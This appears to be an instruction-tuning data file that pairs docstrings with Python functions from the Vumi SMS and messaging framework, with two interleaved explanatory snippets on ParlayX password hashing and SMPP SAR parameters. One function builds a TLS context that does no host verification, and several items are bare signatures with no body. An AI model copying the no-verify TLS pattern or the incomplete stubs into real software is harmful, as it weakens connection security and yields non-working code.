[/INST] def start_sms_notification(self): + body = NOTIFICATION_MANAGER_NS.startSmsNotification( + NOTIFICATION_MANAGER_NS.reference( + L.endpoint(self.endpoint), + L.interfaceName('notifySmsReception'), + L.correlator(self._service_correlator)), + NOTIFICATION_MANAGER_NS.smsServiceActivationNumber( + self.short_code)) + header = self._make_header() + return self.perform_soap_request( + uri=self.notification_uri, + action='', + body=body, + header=header, + expected_faults=[ServiceException]) +[INST] Deregister notification delivery with the remote ParlayX service.. [/INST] def stop_sms_notification(self): + body = NOTIFICATION_MANAGER_NS.stopSmsNotification( + L.correlator(self._service_correlator)) + header = self._make_header() + return self.perform_soap_request( + uri=self.notification_uri, + action='', + body=body, + header=header, + expected_faults=[ServiceException]) +[INST] Fetch the next page of results.. [/INST] def next_page(self): + if not self.has_next_page(): + return succeed(None) + d = deferToThread(self._index_page.next_page) + d.addCallback(type(self)) + d.addErrback(riakErrorHandler) + return d +[INST] Call a function that touches the network and wrap the result in this +class.. [/INST] def _call_and_wrap(self, func): + d = deferToThread(func) + d.addCallback(type(self)) + return d +[INST] Construct an appropriate configuration for the child worker.. [/INST] def construct_worker_config(self, worker_name): + config = deepcopy(self.config.get('defaults', {})) + config.update(self.config.get(worker_name, {})) + return config +[INST] Mark a test method as needing Riak setup.. [/INST] def needs_riak(method): + method.needs_riak = True + return method +[INST] Return a wrapper around `meth` that sets up a RiakManager.. [/INST] def wrap_riak_setup(deco, meth): + @wraps(meth) + def wrapper(self): + deco.setup_riak(self) + return meth(self) + return wrapper +[INST] Return a wrapper around `meth` that sets up a TxRiakManager.. 
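How the ParlayX request password above is derived, using throwaway credentials. The digest input is simply ``service_provider_id + service_provider_password + timestamp``, with the timestamp in the ``%Y%m%d%H%M%S`` form produced by ``format_timestamp``:

import hashlib
from datetime import datetime

service_provider_id = 'sp-0001'          # placeholder
service_provider_password = 'secret'     # placeholder
timestamp = datetime(2014, 1, 1, 12, 30, 0).strftime('%Y%m%d%H%M%S')
# timestamp == '20140101123000'

password = hashlib.md5(
    service_provider_id + service_provider_password + timestamp).hexdigest()
# 32-character hex digest sent alongside the timestamp in the SOAP header.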
[/INST] def wrap_txriak_setup(deco, meth): + @wraps(meth) + def wrapper(self): + d = deco.setup_txriak(self) + return d.addCallback(lambda _: meth(self)) + return wrapper +[INST] Clean up the Riak manager on the given test class.. [/INST] def cleanup_manager(deco, self): + yield self.manager.purge_all() + yield self.manager.close_manager() +[INST] Read various host and worker attributes and wrap them in a message. [/INST] def _beat(self): + attrs = self._gen_attrs_func() + msg = HeartBeatMessage(**attrs) + self.publish_message(msg) +[INST] Check if we should stop throttling, and stop throttling if we should. +At a high level, we try each throttled message in our list until all of +them have been accepted by the SMSC, at which point we stop throttling. + +In more detail. + +We recursively process our list of throttled message_ids until either +we have none left (at which point we stop throttling) or we find one we +can successfully look up in our cache. + +When we find a message we can retry, we retry it and return. We remain +throttled until the SMSC responds. If we're still throttled, the +message_id gets appended to our list and another check is scheduled for +later. If we're no longer throttled, this method gets called again +immediately. + +When there are no more throttled message_ids in our list, we stop +throttling.. [/INST] def _check_stop_throttling(self): + self._unthrottle_delayedCall = None + if not self.is_bound(): + self.log.msg("Can't check throttling while unbound, trying later.") + self.check_stop_throttling() + return + if not self._throttled_pdus: + self.log.msg("No more throttled messages to retry.") + yield self.stop_throttling() + return + seq_no = self._throttled_pdus.pop(0) + pdu_data = yield self.message_stash.get_cached_pdu(seq_no) + yield self.retry_throttled_pdu(pdu_data, seq_no) +[INST] Submit a concatenated SMS to the SMSC using the optional +SAR parameter names in the various PDUS.. [/INST] def submit_csm_sar( + self, vumi_message_id, destination_addr, + reference_rollover=0x10000, **pdu_params): + split_msg = self.csm_split_message(pdu_params.pop('short_message')) + if len(split_msg) == 1: + sequence_numbers = yield self.submit_sm( + vumi_message_id, destination_addr, short_message=split_msg[0], + **pdu_params) + returnValue(sequence_numbers) + optional_parameters = pdu_params.pop('optional_parameters', {}).copy() + ref_num = yield self.sequence_generator.next() + sequence_numbers = [] + yield self.message_stash.init_multipart_info( + vumi_message_id, len(split_msg)) + for i, msg in enumerate(split_msg): + pdu_params = pdu_params.copy() + optional_parameters.update({ + 'sar_msg_ref_num': (ref_num % reference_rollover), + 'sar_total_segments': len(split_msg), + 'sar_segment_seqnum': i + 1, + }) + sequence_number = yield self.submit_sm( + vumi_message_id, destination_addr, short_message=msg, + optional_parameters=optional_parameters, **pdu_params) + sequence_numbers.extend(sequence_number) + returnValue(sequence_numbers) +[INST] Submit a concatenated SMS to the SMSC using user data headers (UDH) +in the message content.. 
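The SAR optional parameters that ``submit_csm_sar`` above attaches to each part of a concatenated message, shown for a three-part message with an assumed ``ref_num`` of 65613 and the default ``reference_rollover`` of 0x10000:

ref_num = 65613
reference_rollover = 0x10000
parts = ['part one ...', 'part two ...', 'part three ...']

for i, part in enumerate(parts):
    sar_params = {
        'sar_msg_ref_num': ref_num % reference_rollover,   # 77 for all parts
        'sar_total_segments': len(parts),                  # 3
        'sar_segment_seqnum': i + 1,                       # 1, 2, 3
    }
    # each part is then sent with
    # submit_sm(..., short_message=part, optional_parameters=sar_params)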
[/INST] def submit_csm_udh(self, vumi_message_id, destination_addr, **pdu_params): + if 'esm_class' in pdu_params: + raise EsmeProtocolError( + 'Cannot specify esm_class, GSM spec sets this at 0x40 ' + 'for concatenated messages using UDH.') + pdu_params = pdu_params.copy() + split_msg = self.csm_split_message(pdu_params.pop('short_message')) + if len(split_msg) == 1: + sequence_numbers = yield self.submit_sm( + vumi_message_id, destination_addr, short_message=split_msg[0], + **pdu_params) + returnValue(sequence_numbers) + ref_num = yield self.sequence_generator.next() + sequence_numbers = [] + yield self.message_stash.init_multipart_info( + vumi_message_id, len(split_msg)) + for i, msg in enumerate(split_msg): + pdu_params['esm_class'] = 0x40 + udh = ''.join([ + '\05', + '\00', + '\03', + chr(ref_num % 0xFF), + chr(len(split_msg)), + chr(i + 1), + ]) + short_message = udh + msg + sequence_number = yield self.submit_sm( + vumi_message_id, destination_addr, short_message=short_message, + **pdu_params) + sequence_numbers.extend(sequence_number) + returnValue(sequence_numbers) +[INST] Publish datapoints to a broker.. [/INST] def send_datapoints(self, exchange, queue, datapoints): + msg = MetricMessage() + msg.extend(datapoints) + self._broker.publish_message(exchange, queue, msg) +[INST] Retrieve datapoints from a broker.. [/INST] def recv_datapoints(self, exchange, queue): + vumi_msgs = self._broker.get_messages(exchange, queue) + msgs = [MetricMessage.from_dict(vm.payload) for vm in vumi_msgs] + return [msg.datapoints() for msg in msgs] +[INST] Return the channel if the recipient is a channel. +Otherwise return None.. [/INST] def channel(self): + if self.recipient[:1] in ('#', '&', '$'): + return self.recipient + return None +[INST] Called when bot has succesfully signed on to server.. [/INST] def signedOn(self): + log.msg("Attempting to join channels: %r" % (self.channels,)) + for channel in self.channels: + self.join(channel) +[INST] This will get called when the bot receives a message.. [/INST] def privmsg(self, sender, recipient, message): + irc_msg = IrcMessage(sender, 'PRIVMSG', recipient, message, + self.nickname) + self.publish_message(irc_msg) +[INST] This will get called when the bot receives a notice.. [/INST] def noticed(self, sender, recipient, message): + irc_msg = IrcMessage(sender, 'NOTICE', recipient, message, + self.nickname) + self.publish_message(irc_msg) +[INST] This will get called when the bot sees someone do an action.. [/INST] def action(self, sender, recipient, message): + irc_msg = IrcMessage(sender, 'ACTION', recipient, message, + self.nickname) + self.publish_message(irc_msg) +[INST] Called when an IRC user changes their nickname.. [/INST] def irc_NICK(self, prefix, params): + old_nick = prefix.partition('!')[0] + new_nick = params[0] + log.msg("Nick changed from %r to %r" % (old_nick, new_nick)) +[INST] Generate an altered version of a nickname that caused a collision in an +effort to create an unused related name for subsequent registration.. [/INST] def alterCollidedNick(self, nickname): + return nickname + '^' +[INST] Non-recursively overlay a set of configuration dictionaries. [/INST] def overlay_configs(*configs): + config = {} + for overlay in configs: + config.update(overlay) + return config +[INST] Parse an (usually) optional YAML config file.. 
[/INST] def read_yaml_config(config_file, optional=True): + if optional and config_file is None: + return {} + with file(config_file, 'r') as stream: + return yaml.load(stream, Loader=SafeLoaderWithInclude) +[INST] Set a worker configuration option (overrides values +specified in the file passed to --config).. [/INST] def opt_set_option(self, keyvalue): + key, _sep, value = keyvalue.partition(':') + self.set_options[key] = value +[INST] Print out a usage message for the worker-class and exit. [/INST] def do_worker_help(self): + worker_class = load_class_by_string(self.worker_class) + self.emit(worker_class.__doc__) + config_class = getattr(worker_class, 'CONFIG_CLASS', None) + if config_class is not None: + self.emit(config_class.__doc__) + self.emit("") + self.exit() +[INST] Build a `MockResponse` containing a SOAP envelope.. [/INST] def build(cls, code, body, header=None): + return cls( + code=code, + delivered_body=tostring(soap_envelope(body, header))) +[INST] Helper for creating an ``notifySmsDeliveryReceipt`` element.. [/INST] def create_sms_delivery_receipt(correlator, address, delivery_status): + return NOTIFICATION_NS.notifySmsDeliveryReceipt( + NOTIFICATION_NS.correlator(correlator), + NOTIFICATION_NS.deliveryStatus( + L.address(format_address(normalize_address(address))), + L.deliveryStatus(delivery_status.name))) +[INST] Logs a message via vumi.log . +Sub-class should override this if they wish to log messages +elsewhere. The `api` parameter is provided for use by such +sub-classes. + +The `log` method should always return a deferred.. [/INST] def log(self, api, msg, level): + return succeed(log.msg(msg, logLevel=level)) +[INST] Use ClientContextFactory directly and set the method if necessary. +This will perform no host verification at all.. [/INST] def _get_noverify_context(self): + from twisted.internet.ssl import ClientContextFactory + context_factory = ClientContextFactory() + if self.ssl_method is not None: + context_factory.method = self.ssl_method + return context_factory.getContext() +[INST] Turn an ElementTree element into an object with named params. +Not recursive!. [/INST] def receipt_to_namedtuple(element): + d = receipt_element_to_dict(element) + klass = namedtuple(element.tag, d.keys()) + return klass._make(d.values()) +[INST] Returns an :class:`SmsSyncMsgInfo` instance for this request. +May return a deferred that yields the actual result to its callback.. [/INST] def msginfo_for_request(self, request): + raise NotImplementedError("Sub-classes should implement" + " msginfo_for_request") +[INST] Returns an :class:`SmsSyncMsgInfo` instance for this outbound +message. + +May return a deferred that yields the actual result to its callback.. [/INST] def msginfo_for_message(self, msg): + raise NotImplementedError("Sub-classes should implement" + " msginfo_for_message") +[INST] Update an outbound message's payload's transport_metadata to allow +msginfo to be reconstructed from replies.. [/INST] def add_msginfo_metadata(self, payload, msginfo): + raise NotImplementedError("Sub-class should implement" + " add_msginfo_metadata") +[INST] Gathers pending messages and sends a response including them.. 
[/INST] def _respond_with_pending_messages(self, msginfo, message_id, **kw): + outbound_ids = [] + outbound_messages = [] + account_key = self.key_for_account(msginfo.account_id) + while True: + msg_json = yield self.redis.lpop(account_key) + if msg_json is None: + break + msg = TransportUserMessage.from_json(msg_json) + outbound_ids.append(msg['message_id']) + outbound_messages.append({'to': msg['to_addr'], + 'message': msg['content'] or ''}) + yield self._send_response(message_id, messages=outbound_messages, **kw) + for outbound_id in outbound_ids: + yield self.publish_ack(user_message_id=outbound_id, + sent_message_id=outbound_id) +[INST] This is overridden in a subclass.. [/INST] def _get_transport_config(self, config): + cfg = self.default_config.copy() + cfg.update(config) + return cfg +[INST] The test cases assume the new config; this flattens the +config keyword argument values to match an old config +layout without the processor configs.. [/INST] def _get_transport_config(self, config): + cfg = self.default_config.copy() + processor_config_keys = [ + 'submit_short_message_processor_config', + 'deliver_short_message_processor_config', + 'delivery_report_processor_config', + ] + for config_key in processor_config_keys: + processor_config = config.pop(config_key, {}) + for name, value in processor_config.items(): + cfg[name] = value + cfg.update(config) + return cfg +[INST] Create a SOAP body containing a SOAP fault.. [/INST] def _make_fault(*a, **kw): + return SOAP_ENV.Body(soap_fault(*a, **kw)) +[INST] Construct a manager from a dictionary of options.. [/INST] def _manager_from_config(cls, config, manager_config): + return cls(VumiRedis(**config), **manager_config) +[INST] Delete *ALL* keys whose names start with this manager's key prefix. +Use only in tests.. [/INST] def _purge_all(self): + for key in self.keys(): + self.delete(key) +[INST] A version of getPage that uses QuietHTTPClientFactory.. [/INST] def quiet_get_page(url, contextFactory=None, *args, **kwargs): + return _makeGetterFactory( + url, + QuietHTTPClientFactory, + contextFactory=contextFactory, + *args, **kwargs).deferred +[INST] Construct a custom raven client and transport-set pair. +The raven client assumes that sends via transports return success or +failure immediately in a blocking fashion and doesn't provide transports +access to the client. + +We circumvent this by constructing a once-off transport class and +raven client pair that work together. Instances of the transport feed +success and failure information back to the client instance once +deferreds complete. + +Pull-requests with better solutions welcomed..
[/INST] def vumi_raven_client(dsn, log_context_sentinel=None): + import raven + from raven.transport.base import TwistedHTTPTransport + from raven.transport.registry import TransportRegistry + remaining_deferreds = set() + if log_context_sentinel is None: + log_context_sentinel = DEFAULT_LOG_CONTEXT_SENTINEL + log_context = {log_context_sentinel: True} + class VumiRavenHTTPTransport(TwistedHTTPTransport): + scheme = ['http', 'https'] + def _get_page(self, data, headers): + d = quiet_get_page(self._url, method='POST', postdata=data, + headers=headers) + self._track_deferred(d) + self._track_client_state(d) + return d + def _track_deferred(self, d): + remaining_deferreds.add(d) + d.addBoth(self._untrack_deferred, d) + def _untrack_deferred(self, result, d): + remaining_deferreds.discard(d) + return result + def _track_client_state(self, d): + d.addCallbacks(self._set_client_success, self._set_client_fail) + def _set_client_success(self, result): + client.state.set_success() + return result + def _set_client_fail(self, result): + client.state.set_fail() + return result + def send(self, data, headers): + d = self._get_page(data, headers) + d.addErrback(lambda f: log.err(f, **log_context)) + class VumiRavenClient(raven.Client): + _registry = TransportRegistry(transports=[ + VumiRavenHTTPTransport + ]) + def teardown(self): + return DeferredList(remaining_deferreds) + client = VumiRavenClient(dsn) + return client +[INST] Run once for each key. +May return either the name of the key (if the key should +be processed by later tasks), the new name of the key (if +the key was renamed and should be processed by later tasks) +or ``None`` (if the key has been deleted or should not be +processed by further tasks).. [/INST] def process_key(self, key): + return key +[INST] Print the given string and then a newline.. [/INST] def emit(self, s): + self.stdout.write(s) + self.stdout.write("\n") +[INST] Apply all tasks to all keys.. [/INST] def run(self): + for task in self.tasks: + task.init(self, self.redis) + for task in self.tasks: + task.before() + for key in scan_keys(self.redis, self.match_pattern): + for task in self.tasks: + key = task.process_key(key) + if key is None: + break + for task in self.tasks: + task.after() +[INST] Add any needed HTTP headers to the request. +Often used to set the Content-Type header.. [/INST] def add_http_headers(request): +[INST] Write any header bytes that need to be written to the request before +messages.. [/INST] def write_row_header(request): +[INST] Perform teardown required for router.. [/INST] def teardown_routing(self): + pass +[INST] Dispatch an inbound user message to a publisher.. [/INST] def dispatch_inbound_message(self, msg): + raise NotImplementedError() +[INST] Dispatch an event to a publisher.. [/INST] def dispatch_inbound_event(self, msg): + raise NotImplementedError() +[INST] Dispatch an outbound user message to a publisher.. [/INST] def dispatch_outbound_message(self, msg): + raise NotImplementedError() +[INST] Explicitly throw away events, because transports can't receive them.. [/INST] def dispatch_inbound_event(self, msg): + pass +[INST] If we're only hooking transports up to each other, there are no +outbound messages.. [/INST] def dispatch_outbound_message(self, msg): + pass +[INST] Start and return the given MockHttpServer with suitable cleanup.. 
[/INST] def start_mock_server(self, mock_server): + self.add_cleanup(mock_server.stop) + d = mock_server.start() + return d.addCallback(lambda _: mock_server) +[INST] Creates a manager, purges all the riak data with it, then closes it.. [/INST] def purge_txriak(self): + manager = self.create_txriak_manager() + yield manager.purge_all() + yield manager.close_manager() +[INST] Creates and returns a TxRiakManager, handling cleanup.. [/INST] def create_txriak_manager(self): + try: + from vumi.persist.txriak_manager import TxRiakManager + except ImportError, e: + import_skip(e, 'riak', 'riak') + self.add_cleanup(self.purge_txriak) + return TxRiakManager.from_config({'bucket_prefix': 'test.'}) +[INST] Creates a manager, purges all the riak data with it, then closes it.. [/INST] def purge_riak(self): + manager = self.create_riak_manager() + manager.purge_all() + manager.close_manager() +[INST] Creates and returns a RiakManager, handling cleanup.. [/INST] def create_riak_manager(self): + try: + from vumi.persist.riak_manager import RiakManager + except ImportError, e: + import_skip(e, 'riak', 'riak') + self.add_cleanup(self.purge_riak) + return RiakManager.from_config({'bucket_prefix': 'test.'}) +[INST] Set the TTL on multipart info hash to something small. We don't delete +this in case there's still an in-flight operation that will recreate it +without a TTL.. [/INST] def expire_multipart_info(self, message_id): + expiry = self.config.completed_multipart_info_expiry + return self.redis.expire(multipart_info_key(message_id), expiry) +[INST] Does various setup work in order to be able to accurately +store cached data for a batch_id. + +A call to this isn't necessary but good for general house keeping.. [/INST] def batch_start(self, batch_id, use_counters=True): + yield self.redis.sadd(self.batch_key(), batch_id) + yield self.init_status(batch_id) + if use_counters: + yield self.redis.set(self.inbound_count_key(batch_id), 0) + yield self.redis.set(self.outbound_count_key(batch_id), 0) + yield self.redis.set(self.event_count_key(batch_id), 0) +[INST] Removes all cached values for the given batch_id, useful before +a reconciliation happens to ensure that we start from scratch. + +This will reset all counters back to zero and will increment +them as messages are received. If your UI depends on your +cached values your UI values might be off while the +reconciliation is taking place.. [/INST] def clear_batch(self, batch_id): + yield self.redis.delete(self.inbound_key(batch_id)) + yield self.redis.delete(self.inbound_count_key(batch_id)) + yield self.redis.delete(self.outbound_key(batch_id)) + yield self.redis.delete(self.outbound_count_key(batch_id)) + yield self.redis.delete(self.event_key(batch_id)) + yield self.redis.delete(self.event_count_key(batch_id)) + yield self.redis.delete(self.status_key(batch_id)) + yield self.redis.delete(self.to_addr_key(batch_id)) + yield self.redis.delete(self.from_addr_key(batch_id)) + yield self.redis.srem(self.batch_key(), batch_id) +[INST] Add an outbound message to the cache for the given batch_id. [/INST] def add_outbound_message(self, batch_id, msg): + timestamp = self.get_timestamp(msg['timestamp']) + yield self.add_outbound_message_key( + batch_id, msg['message_id'], timestamp) + yield self.add_to_addr(batch_id, msg['to_addr']) +[INST] Add a message key, weighted with the timestamp to the batch_id.. 
[/INST] def add_outbound_message_key(self, batch_id, message_key, timestamp): + new_entry = yield self.redis.zadd(self.outbound_key(batch_id), **{ + message_key.encode('utf-8'): timestamp, + }) + if new_entry: + yield self.increment_event_status(batch_id, 'sent') + uses_counters = yield self.uses_counters(batch_id) + if uses_counters: + yield self.redis.incr(self.outbound_count_key(batch_id)) + yield self.truncate_outbound_message_keys(batch_id) +[INST] Add a count to all outbound message counters. (Used for recon.). [/INST] def add_outbound_message_count(self, batch_id, count): + yield self.increment_event_status(batch_id, 'sent', count) + yield self.redis.incr(self.outbound_count_key(batch_id), count) +[INST] Add a count to all relevant event counters. (Used for recon.). [/INST] def add_event_count(self, batch_id, status, count): + yield self.increment_event_status(batch_id, status, count) + yield self.redis.incr(self.event_count_key(batch_id), count) +[INST] Add an event to the cache for the given batch_id. [/INST] def add_event(self, batch_id, event): + event_id = event['event_id'] + timestamp = self.get_timestamp(event['timestamp']) + new_entry = yield self.add_event_key(batch_id, event_id, timestamp) + if new_entry: + event_type = event['event_type'] + yield self.increment_event_status(batch_id, event_type) + if event_type == 'delivery_report': + yield self.increment_event_status( + batch_id, '%s.%s' % (event_type, event['delivery_status'])) +[INST] Add the event key to the set of known event keys. +Returns 0 if the key already exists in the set, 1 if it doesn't.. [/INST] def add_event_key(self, batch_id, event_key, timestamp): + uses_event_counters = yield self.uses_event_counters(batch_id) + if uses_event_counters: + new_entry = yield self.redis.zadd(self.event_key(batch_id), **{ + event_key.encode('utf-8'): timestamp, + }) + if new_entry: + yield self.redis.incr(self.event_count_key(batch_id)) + yield self.truncate_event_keys(batch_id) + returnValue(new_entry) + else: + returnValue(False) + new_entry = yield self.redis.sadd( + self.event_key(batch_id), event_key) + returnValue(new_entry) +[INST] Increment the status for the given event_type for the given batch_id.. [/INST] def increment_event_status(self, batch_id, event_type, count=1): + return self.redis.hincrby(self.status_key(batch_id), event_type, count) +[INST] Add an inbound message to the cache for the given batch_id. [/INST] def add_inbound_message(self, batch_id, msg): + timestamp = self.get_timestamp(msg['timestamp']) + yield self.add_inbound_message_key( + batch_id, msg['message_id'], timestamp) + yield self.add_from_addr(batch_id, msg['from_addr']) +[INST] Add a message key, weighted with the timestamp to the batch_id. [/INST] def add_inbound_message_key(self, batch_id, message_key, timestamp): + new_entry = yield self.redis.zadd(self.inbound_key(batch_id), **{ + message_key.encode('utf-8'): timestamp, + }) + if new_entry: + uses_counters = yield self.uses_counters(batch_id) + if uses_counters: + yield self.redis.incr(self.inbound_count_key(batch_id)) + yield self.truncate_inbound_message_keys(batch_id) +[INST] Add a count to all inbound message counters. (Used for recon.). [/INST] def add_inbound_message_count(self, batch_id, count): + yield self.redis.incr(self.inbound_count_key(batch_id), count) +[INST] Add a from_addr to this batch_id using Redis's HyperLogLog +functionality. Generally this information is set when +`add_inbound_message()` is called.. 
[/INST] def add_from_addr(self, batch_id, from_addr): + return self.redis.pfadd( + self.from_addr_key(batch_id), from_addr.encode('utf-8')) +[INST] Return count of the unique from_addrs in this batch. Note that the +returned count is not exact.. [/INST] def count_from_addrs(self, batch_id): + return self.redis.pfcount(self.from_addr_key(batch_id)) +[INST] Return count of the unique to_addrs in this batch. Note that the +returned count is not exact.. [/INST] def count_to_addrs(self, batch_id): + return self.redis.pfcount(self.to_addr_key(batch_id)) +[INST] Return the count of the unique inbound message keys for this batch_id. [/INST] def count_inbound_message_keys(self, batch_id): + if not (yield self.uses_counters(batch_id)): + returnValue((yield self.inbound_message_keys_size(batch_id))) + count = yield self.inbound_message_count(batch_id) + returnValue(count) +[INST] Return the count of the unique outbound message keys for this batch_id. [/INST] def count_outbound_message_keys(self, batch_id): + if not (yield self.uses_counters(batch_id)): + returnValue((yield self.outbound_message_keys_size(batch_id))) + count = yield self.outbound_message_count(batch_id) + returnValue(count) +[INST] Return the count of the unique event keys for this batch_id. [/INST] def count_event_keys(self, batch_id): + uses_event_counters = yield self.uses_event_counters(batch_id) + if uses_event_counters: + count = yield self.event_count(batch_id) + returnValue(count) + else: + count = yield self.redis.scard(self.event_key(batch_id)) + returnValue(count) +[INST] Calculate the number of messages seen in the last `sample_time` amount +of seconds.. [/INST] def count_inbound_throughput(self, batch_id, sample_time=300): + last_seen = yield self.redis.zrange( + self.inbound_key(batch_id), 0, 0, desc=True, + withscores=True) + if not last_seen: + returnValue(0) + [(latest, timestamp)] = last_seen + count = yield self.redis.zcount( + self.inbound_key(batch_id), timestamp - sample_time, timestamp) + returnValue(int(count)) +[INST] Calculate the number of messages seen in the last `sample_time` amount +of seconds.. [/INST] def count_outbound_throughput(self, batch_id, sample_time=300): + last_seen = yield self.redis.zrange( + self.outbound_key(batch_id), 0, 0, desc=True, withscores=True) + if not last_seen: + returnValue(0) + [(latest, timestamp)] = last_seen + count = yield self.redis.zcount( + self.outbound_key(batch_id), timestamp - sample_time, timestamp) + returnValue(int(count)) +[INST] Store the inbound query results for a query that was started with +`start_inbound_query`. Internally this grabs the timestamps from +the cache (there is an assumption that it has already been reconciled) +and orders the results accordingly.. [/INST] def store_query_results(self, batch_id, token, keys, direction, + ttl=None): + ttl = ttl or self.DEFAULT_SEARCH_RESULT_TTL + result_key = self.search_result_key(batch_id, token) + if direction == 'inbound': + score_set_key = self.inbound_key(batch_id) + elif direction == 'outbound': + score_set_key = self.outbound_key(batch_id) + else: + raise MessageStoreCacheException('Invalid direction') + for key in keys: + timestamp = yield self.redis.zscore(score_set_key, key) + yield self.redis.zadd(result_key, **{ + key.encode('utf-8'): timestamp, + }) + yield self.redis.expire(result_key, ttl) + yield self.redis.srem(self.search_token_key(batch_id), token) +[INST] Handle a delivery report PDU from the networks. + +All processors should implement this even if it does nothing.. 
[/INST] def handle_delivery_report_pdu(pdu_data): +[INST] Handle an unpacked delivery report from the networks. +This can happen with certain SMSCs that don't set the necessary +delivery report flags on a PDU. As a result we only detect the DR by +matching a received SM against a predefined regex.. [/INST] def handle_delivery_report_content(pdu_data): +[INST] Handle a short message PDU from the networks after it has been +re-assembled and decoded. + + + +All processors should implement this even if it does nothing.. [/INST] def handle_short_message_pdu(pdu): +[INST] Handle a part of a multipart PDU. + +All processors should implement this even if it does nothing.. [/INST] def handle_multipart_pdu(pdu): +[INST] Handle a USSD pdu. + +It is likely that the USSD bits of this Interface will move to +its own Interface implementation once work starts on an USSD over +SMPP implementation. + +All processors should implement this even if it does nothing.. [/INST] def handle_ussd_pdu(pdu): +[INST] Decode a byte string and return the unicode string for it according +to the specified data coding.. [/INST] def dcs_decode(obj, data_coding): +[INST] Handle an outbound message from Vumi by calling the appropriate +methods on the service with the appropriate parameters. + +These parameters and values can differ per MNO. + +Should return a Deferred that fires with a the list of sequence_numbers +returning from the submit_sm calls.. [/INST] def handle_raw_outbound_message(vumi_message, smpp_service): +[INST] Schedule a message delivery run. +Returns a deferred that will fire when all deliverable +messages have been delivered and processed by their consumers. +This is useful for manually triggering a delivery run from +inside a test.. [/INST] def kick_delivery(self): + if self._delivering is None: + self._delivering = { + 'deferred': Deferred(), + 'count': 0, + } + self._delivering['count'] += 1 + reactor.callLater(0, self.deliver_to_channels) + return self.wait_delivery() +[INST] Wait for the current message delivery run (if any) to finish. +Returns a deferred that will fire when the broker is finished +delivering any messages from the current run. This should not +leave any messages undelivered, because basic_publish() kicks +off a delivery run. + +Each call returns a new deferred to avoid callback chain ordering +issues when several things want to wait for delivery. + +This method should be called during test teardown to make +sure there are no pending delivery cleanups that will cause a +dirty reactor race.. [/INST] def wait_delivery(self): + d = Deferred() + if self._delivering is None: + d.callback(None) + else: + self._delivering['deferred'].chainDeferred(d) + return d +[INST] Notify the broker that a message has been processed, in order +to make delivery sane.. [/INST] def message_processed(self): + self.broker.message_processed() +[INST] Register cleanup and perform setup for a helper object.. [/INST] def add_helper(helper_object, *args, **kwargs): +[INST] Mark a method as being suitable for automatic proxy generation. +See :func:`generate_proxies` for usage.. [/INST] def proxyable(func): + func.proxyable = True + return func +[INST] We can't necessarily use TestCase.successResultOf because our Twisted might +not be new enough. This is a standalone copy with some minor message +differences.. 
[/INST] def success_result_of(d): + results = [] + d.addBoth(results.append) + if not results: + raise FailTest("No result available for deferred: %r" % (d,)) + if isinstance(results[0], Failure): + raise FailTest("Expected success from deferred %r, got failure: %r" % ( + d, results[0])) + return results[0] +[INST] Poll the reactor for unclosed connections and wait for them to close. +Properly waiting for all connections to finish closing requires hooking +into :meth:`Protocol.connectionLost` in both client and server. Since +this isn't practical in all cases, we check the reactor for any open +connections and wait a bit for them to finish closing if we find any. + +This will only wait for connections that close on their own. Any +connections that have been left open will stay open (unless they +time out or something) and will leave the reactor dirty after we +stop waiting.. [/INST] def _check_reactor_things(self): + from twisted.internet import reactor + yield deferLater(reactor, 0, lambda: None) + for i in range(self.reactor_check_iterations): + internal_readers = getattr(reactor, '_internalReaders', set()) + selectables = set(reactor.getReaders() + reactor.getWriters()) + if not (selectables - internal_readers): + return + yield deferLater( + reactor, self.reactor_check_interval, lambda: None) +[INST] Register a cleanup function to be called at teardown time.. [/INST] def add_cleanup(self, func, *args, **kw): + if self._cleanup_funcs is None: + self._cleanup_funcs = [] + self._cleanup_funcs.append((func, args, kw)) +[INST] Perform setup and register cleanup for the given helper object.. [/INST] def add_helper(self, helper_object, *args, **kw): + if not IHelper.providedBy(helper_object): + raise ValueError( + "Helper object does not provide the IHelper interface: %s" % ( + helper_object,)) + self.add_cleanup(helper_object.cleanup) + return maybe_async_return( + helper_object, helper_object.setup(*args, **kw)) +[INST] The only real difference between using this method and constructing a +message object directly is that this method provides sensible defaults +for most fields and sets the routing endpoint (if provided) in a more +convenient way. + +The following parameters are mandatory.. [/INST] def make_user_message(self, content, from_addr, to_addr, group=None, + session_event=None, transport_type=DEFAULT, + transport_name=DEFAULT, transport_metadata=DEFAULT, + helper_metadata=DEFAULT, endpoint=DEFAULT, **kw): + if transport_type is DEFAULT: + transport_type = self.transport_type + if helper_metadata is DEFAULT: + helper_metadata = {} + if transport_metadata is DEFAULT: + transport_metadata = {} + if transport_name is DEFAULT: + transport_name = self.transport_name + msg = TransportUserMessage( + from_addr=from_addr, + to_addr=to_addr, + group=group, + transport_name=transport_name, + transport_type=transport_type, + transport_metadata=transport_metadata, + helper_metadata=helper_metadata, + content=content, + session_event=session_event, + **kw) + if endpoint is not DEFAULT: + msg.set_routing_endpoint(endpoint) + return msg +[INST] Wait for any pending message deliveries and stop all workers.. [/INST] def cleanup(self): + yield self.broker.wait_delivery() + for worker in self._workers: + yield worker.stopWorker() +[INST] Clean up a particular worker manually and remove it from the helper's +cleanup list. This should only be called with workers that are already +in the helper's cleanup list.. 
[/INST] def cleanup_worker(self, worker): + self._workers.remove(worker) + return worker.stopWorker() +[INST] Clear all dispatched messages from the broker.. [/INST] def clear_all_dispatched(self): + self.broker.clear_messages('vumi') + self.broker.clear_messages('vumi.metrics') +[INST] Wait for events dispatched to a connector.. [/INST] def wait_for_dispatched_events(self, amount=None, connector_name=None): + d = self._wait_for_dispatched(connector_name, 'event', amount) + d.addCallback(lambda msgs: [ + TransportEvent(**msg.payload) for msg in msgs]) + return d +[INST] Wait for inbound messages dispatched to a connector.. [/INST] def wait_for_dispatched_inbound(self, amount=None, connector_name=None): + d = self._wait_for_dispatched(connector_name, 'inbound', amount) + d.addCallback(lambda msgs: [ + TransportUserMessage(**msg.payload) for msg in msgs]) + return d +[INST] Wait for outbound messages dispatched to a connector.. [/INST] def wait_for_dispatched_outbound(self, amount=None, connector_name=None): + d = self._wait_for_dispatched(connector_name, 'outbound', amount) + d.addCallback(lambda msgs: [ + TransportUserMessage(**msg.payload) for msg in msgs]) + return d +[INST] Wait for statuses dispatched to a connector.. [/INST] def wait_for_dispatched_statuses(self, amount=None, connector_name=None): + if connector_name is None: + connector_name = self._status_connector_name + d = self._wait_for_dispatched(connector_name, 'status', amount) + d.addCallback(lambda msgs: [ + TransportStatus(**msg.payload) for msg in msgs]) + return d +[INST] Clear dispatched events for a connector.. [/INST] def clear_dispatched_events(self, connector_name=None): + return self._clear_dispatched(connector_name, 'event') +[INST] Clear dispatched inbound messages for a connector.. 